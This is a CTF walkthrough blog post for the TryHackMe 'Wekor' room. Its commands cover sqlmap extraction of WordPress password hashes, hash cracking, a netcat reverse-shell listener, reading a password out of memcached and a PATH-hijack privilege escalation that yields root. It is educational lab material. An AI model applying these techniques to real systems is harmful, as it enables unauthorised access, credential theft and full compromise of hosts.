TryHackme : Wekor Writeup

After a very long time I am sharing a walk-through because I really like this CTF challenge (wekor), This challenge includes SQLi, wordpress and other things like recognizing internal service for privilege escalation.

TryHackme : Wekor Writeup

Challenge Link - https://tryhackme.com/room/wekorra

Initial Enumeration

As usual I started with nmap scan or rustscan for faster results using the command shown below.


❯ rustscan 10.10.4.25 --range 0-65535 --ulimit 5000 -- -sC -sV -Pn -o nmap.txt
.
.
.
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 95:c3:ce:af:07:fa:e2:8e:29:04:e4:cd:14:6a:21:b5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDn0l/KSmAk6LfT9R73YXvsc6g8qGZvMS+A5lJ19L4G5xbhSpCoEN0kBEZZQfI80sEU7boAfD0/VcdFhURkPxDUdN1wN7a/4alpMMMKf2ey0tpnWTn9nM9JVVI9rloaiD8nIuLesjigq+eEQCaEijfArUtzAJpESwRHrtm2OWTJ+PYNt1NDIbQm1HJHPasD7Im/wW6MF04mB04UrTwhWBHV4lziH7Rk8DYOI1xxfzz7J8bIatuWaRe879XtYA0RgepMzoXKHfLXrOlWJusPtMO2x+ATN2CBEhnNzxiXq+2In/RYMu58uvPBeabSa74BthiucrdJdSwobYVIL27kCt89
|   256 4d:99:b5:68:af:bb:4e:66:ce:72:70:e6:e3:f8:96:a4 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKJLaFNlUUzaESL+JpUKy/u7jH4OX+57J/GtTCgmoGOg4Fh8mGqS8r5HAgBMg/Bq2i9OHuTMuqazw//oQtRYOhE=
|   256 0d:e5:7d:e8:1a:12:c0:dd:b7:66:5e:98:34:55:59:f6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJvvZ5IaMI7DHXHlMkfmqQeKKGHVMSEYbz0bYhIqPp62
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 9 disallowed entries 
| /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot 
|_/comingreallysoon /interesting

We have two open ports and from the scan result we have some interesting directories in robots.txt file and only /comingreallysoon is available and also from the introduction of the room we have to use "wekor.thm" as domain name, visiting http://wekor.thm/comingreallysoon gives another directory.

Welcome Dear Client! We've setup our latest website on /it-next, Please go check it out! If you have any comments or suggestions, please tweet them to @faketwitteraccount! Thanks a lot !

We have a web application on /it-next which is a shopping website. The next step is to run directory bruteforce on /it-next using the command shown below:

❯ ffuf -u http://wekor.thm/it-next/FUZZ -fc 404 -t 250 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
.
.
.
________________________________________________

images                  [Status: 301, Size: 315, Words: 20, Lines: 10]
css                     [Status: 301, Size: 312, Words: 20, Lines: 10]
js                      [Status: 301, Size: 311, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 314, Words: 20, Lines: 10]
revolution              [Status: 301, Size: 319, Words: 20, Lines: 10]

I checked all the directories but couldn't find anything useful, next I decided to again run directory brute force with some common extension specially PHP.

❯ ffuf -u http://wekor.thm/it-next/FUZZ -e .php,.txt,.html,.js -fc 404 -t 250 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
.
.
.
________________________________________________

images                  [Status: 301, Size: 315, Words: 20, Lines: 10]
index.php               [Status: 200, Size: 66925, Words: 19904, Lines: 1246]
css                     [Status: 301, Size: 312, Words: 20, Lines: 10]
js                      [Status: 301, Size: 311, Words: 20, Lines: 10]
config.php              [Status: 200, Size: 0, Words: 1, Lines: 1]
fonts                   [Status: 301, Size: 314, Words: 20, Lines: 10]

Found some .php files but they are of no use, next I decided to enumerate the website manually and found something interesting in http://wekor.thm/it-next/it_cart.php, at the end we can use a COUPON code , I tried with code 11 and it doesn't worked next I tried with 12345 and it worked.

Coupon Code : 12345 With ID : 1 And With Expire Date Of : doesnotexpire Is Valid!

Nice, means these codes are stored somewhere in the database and this form can be vulnerable to SQL injection, I tried manual exploitation first and it worked very easily, for blog purpose I have used sqlmap otherwise blog will become very lengthy, you can contact me on discord cyberbot#1859 if you need help in manual SQL injection.

❯ sqlmap --url "http://wekor.thm/it-next/it_cart.php" --dbs --forms
.
.
.
available databases [6]:
[*] coupons
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress

Umm a database for wordpress? okay, we will exploit this vulnerability later because first of all we have to find a wordpress website, we have domain wekor.thm so what if there are subdomains and one of the subdomains is using wordpress, let's find out.

❯ ffuf -H "Host: FUZZ.wekor.thm" -u http://wekor.thm -t 500 -fs 23 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
.
.
.
________________________________________________

Site                    [Status: 200, Size: 143, Words: 27, Lines: 6]
[WARN] Caught keyboard interrupt (Ctrl-C)

Let's add this to /etc/hosts file.

❯ cat /etc/hosts | grep -i "wekor"
10.10.4.25	wekor.thm site.wekor.thm

Visiting http://site.wekor.thm/ doesn't give any information, next I decided to run directory brute-force against this subdomain using the command shown below.

❯ ffuf -u http://site.wekor.thm/FUZZ -fc 404 -t 250 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
.
.
.
________________________________________________

wordpress               [Status: 301, Size: 320, Words: 20, Lines: 10]

Great we have found the wordpress website, now let's get back to the SQLi vulnerability to get username and password for wordpress login.

❯ sqlmap --url "http://wekor.thm/it-next/it_cart.php" -D wordpress --tables --forms
.
.
.
.
Database: wordpress
[12 tables]
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+






** Fetching columns name in wp_users tables using the command .**

❯ sqlmap --url "http://wekor.thm/it-next/it_cart.php" -D wordpress -T wp_users --columns --forms
.
.
.
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| display_name        | varchar(250)        |
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(255)        |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicename       | varchar(50)         |
| user_pass           | varchar(255)        |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+


**Fetching all the records in column user_login and user_pass**

❯ sqlmap --url "http://wekor.thm/it-next/it_cart.php" -D wordpress -T wp_users -C user_login,user_pass --forms --dump
.
.
.

Table: wp_users
[4 entries]
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$BoyfR2************************* |
| wp_jeffrey | $P$BU8QpW************************* |
| wp_yura    | $P$B6jSC3************************* |
| wp_eagle   | $P$BpyTRb************************* |
+------------+------------------------------------|


Cracking all the hashes and 3 out of 4 were cracked easily using john.

❯ ../../john/run/john --show hash
?:ro**
?:s**
?:xx***

3 password hashes cracked, 1 left

We need to login into the admin panel and I found that user  wp_yura has maximum privileges in the control panel.

Now it's easy to get a reverse shell using the theme editor technique, right ? I have skipped that part, now let's directly jump to privilege escalation.

❯ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.6.64.121] from (UNKNOWN) [10.10.4.25] 42488
Linux osboxes 4.15.0-133-generic #137~16.04.1-Ubuntu SMP Fri Jan 15 02:55:05 UTC 2021 i686 i686 i686 GNU/Linux
 03:58:22 up  1:45,  0 users,  load average: 0.02, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cd /home
$ ls
Orka
lost+found
c$cd Orka
/bin/sh: 3: cd: can't cd to Orka

I found one user in /home but www-data can't access Orka's home directory, Now I started to explore different files and folders but failed to find anything. Next I thought to check for services running internally that are for only 127.0.0.1.

Command Used:

www-data@osboxes:/home$ netstat -ano
netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3010          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      off (0.00/0/0)

Service running on port 11211 is memcached and I have seen this service enumeration in different CTF challenges, basically we can use this service to find the password of user Orka, If I am not thinking in the wrong way, you can read more about memcached exploitation here .

www-data@osboxes:/home$ telnet 127.0.0.1 11211
telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats cachedump 1 0
stats cachedump 1 0
ITEM id [4 b; 1615360322 s]
ITEM email [14 b; 1615360322 s]
ITEM salary [8 b; 1615360322 s]
ITEM password [15 b; 1615360322 s]
ITEM username [4 b; 1615360322 s]
END
get username
get username
VALUE username 0 4
Orka
END
get password
get password
VALUE password 0 15
OrkAiSC****
END

Nice we have Orka's password, using su Orka we can get Orka's shell.

www-data@osboxes:/home$ su Orka
su Orka
Password: OrkAiS****

Orka@osboxes:/home$ id
id
uid=1001(Orka) gid=1001(Orka) groups=1001(Orka)
Orka@osboxes:/home$

Using sudo -l to check for user privileges and found this interesting thing:

env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Orka may run the following commands on osboxes:
    (root) /home/Orka/Desktop/bitcoin

Running bitcoin binary as root.

Orka@osboxes:/home$ sudo -u root /home/Orka/Desktop/bitcoin
sudo -u root /home/Orka/Desktop/bitcoin
Enter the password : lol
lol
Access Denied...

We need to find the correct password to get in, I transferred the binary to my local system and then opened it in ghidra and there I found the correct password.

After accepting the correct password binary is also running a python script and if we observe carefully then it is not using the absolute path it is just using python and we can take advantage of this by PATH privilege escalation.

Orka@osboxes:/tmp$ cat python
cat python
#!/bin/bash
/bin/bash
Orka@osboxes:/tmp$ chmod 777 python
chmod 777 python
Orka@osboxes:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH

Running bitcoin binary as user root, but nothing happened, our python script in /tmp didn't execute why ? Well I don't know the reason for this but then I thought to run the command echo $PATH in my local system and also in the target machine and got completely different results.

Orka@osboxes:/tmp$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games



❯ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Now I run the linpeas.sh script and found that /usr/sbin/ is writable so I just copied python named file from /tmp to /usr/sbin/ because /usr/sbin/ has more precedence than /usr/bin/, again executing bitcoin binary as root and this time it will call the python in /usr/sbin/ instead of python in /usr/bin/.

Orka@osboxes:~$ cp /tmp/python /usr/sbin/
cp /tmp/python /usr/sbin/
Orka@osboxes:~$ sudo -u root /home/Orka/Desktop/bitcoin
sudo -u root /home/Orka/Desktop/bitcoin
Enter the password : ***
password
Access Granted...
			User Manual:			
Maximum Amount Of BitCoins Possible To Transfer at a time : 9 
Amounts with more than one number will be stripped off! 
And Lastly, be careful, everything is logged :) 
Amount Of BitCoins : 1
1
root@osboxes:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@osboxes:~#

We are root now and this completed the challenge! Hope you like the walkthrough, For any queries you can contact me on discord cyberbot#1859.

NOTE: The awesome artwork used in this article was created by chubasan.